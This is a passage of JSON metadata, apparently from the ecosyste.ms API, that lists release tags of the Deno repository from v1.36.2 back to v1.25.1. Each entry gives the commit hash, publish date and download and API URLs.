,"manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/rep